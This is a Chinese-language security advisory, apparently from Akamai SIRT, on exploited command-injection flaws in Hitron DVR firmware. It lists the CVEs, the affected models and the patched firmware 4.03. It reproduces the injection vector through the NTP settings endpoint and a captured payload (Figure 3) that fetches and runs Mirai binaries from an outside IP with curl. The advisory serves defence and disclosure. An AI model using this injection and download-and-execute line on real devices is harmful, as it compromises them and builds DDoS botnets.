Hitron DVR 中被频繁利用的漏洞:已修复,有补丁可用
执行摘要
由于其中一家受影响的供应商已发布了补丁和指南,Akamai 安全情报响应团队 (SIRT) 针对 InfectedSlurs 公告 系列堆出了额外的更新。
在现实环境中发现 Hitron 存在漏洞,CVE ID 提供如下:
CVE-2024-22768 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
CVE-2024-22769 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
CVE-2024-22770 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
CVE-2024-22771 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
CVE-2024-22772 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
CVE-2024-23842 — 经计算,CVSS v3.1 基本评分为 7.4 ,CVSS 媒介字符串为 (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)。
在现实环境中捕获的恶意攻击负载会安装基于 Mirai 的恶意软件,进而创建 分布式拒绝服务 (DDoS) 僵尸网络。
我们在原始研究中提供了一个包含各种 攻击迹象 (IOC)、Snort 规则和 YARA 规则 的列表,以帮助确定现实环境中的这些漏洞利用尝试以及帮助发现防御者网络中可能存在的活跃感染。
您需要了解的内容
除了发现 InfectedSlurs 以外,Akamai SIRT 还在多个 Hitron DVR 设备型号中发现了几个被攻击者频繁利用的漏洞。Hitron 设备由 Hitron Systems 在韩国制造。
借助该漏洞,经过身份验证的攻击者可以通过对管理接口发出的 POST 请求来传送攻击负载,进而实现操作系统命令注入。在其当前配置中,它会利用已捕获的有效负载中的设备默认凭据。
受影响的设备和固件版本如下:
DVR HVR-4781:版本 1.03 至 4.02
DVR HVR-8781:版本 1.03 至 4.02
DVR HVR-16781:版本 1.03 至 4.02
DVR LGUVR-4H:版本 1.02 至 4.02
DVR LGUVR-8H:版本 1.02 至 4.02
DVR LGUVR-16H:版本 1.02 至 4.02
该供应商 (Hitron Systems) 已发布新的固件版本来解决这些漏洞。供应商建议尽快将所有受影响的型号升级到固件版本 ≥ 4.03。此外, CISA 和 KISA也发布了公告。KISA 还发布了与各个 CVE 相关的公告,可在以下链接中找到:
观察到的漏洞利用情况
2023 年 10 月底,Akamai SIRT 分析师注意到,针对很少被滥用的 TCP 端口的蜜罐活动激增。这些探测行为频率较低,并且似乎是首次尝试向 /cgi-bin/system_ntp.cgi 发送 POST 请求来进行身份验证(图 1),然后尝试进行命令注入利用(图 2)。目标设备是 Hitron Systems DVR 设备,这些设备容易通过命令注入受到 RCE 攻击(图 3)。经过身份验证后,攻击者通过向以下位置发送 POST 请求来利用 timeserver 参数中的命令注入漏洞: /cgi-bin/system_ntp.cgi。
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
图 1:身份验证企图
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0×erver=[RCE
PAYLOAD]&interval=60&enableNTPServer=1
图 2:漏洞利用企图
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
图 3:捕获到的 RCE 负载
防护
运行受此漏洞影响的设备的 Hitron DVR 用户应立即升级到已修复 RCE 漏洞的最新可用固件版本 (≥ 4.03)。
HVR-4781: 版本 4.03
HVR-8781: 版本 4.03
HVR-16781: 版本 4.03
LGUVR-4H: 版本 4.03
LGUVR-8H: 版本 4.03
LGUVR-16H: 版本 4.03
此外,为了防范目前这种威胁以及未来的威胁,应实施多种安全措施。 首先,使用受影响设备的企业和个人应立即更改默认登录凭据以增强安全性。定期监控网络流量和日志有助于及早发现可疑活动。及时安装设备制造商提供的安全补丁和更新对于解决已识别的漏洞至关重要。
与安全研究人员、威胁情报提供商和行业同行合作,有助于随时了解新出现的威胁和漏洞。最后,维护联网设备的更新清单并实施 网络分段 可以限制此类攻击的潜在影响。
结论
解决 Hitron Systems 及相关设备中发现的安全问题需要采取多层方法,将用户意识、及时修补、主动监控以及网络安全社区内的协作结合起来。通过采取这些措施,企业和个人可以显著降低已观察到的恶意活动所带来的风险。
关注最新动态
如需及时了解 SIRT 和其他 Akamai 安全研究小组发现的威胁和其他调查结果, 请关注我们的微信公众号, 或查看我们的 SIG 中心。
对于 CISA、US-CERT 和 KISA 工作人员在我们向供应商报告这些漏洞上提供的帮助,Akamai SIRT 深表感谢。
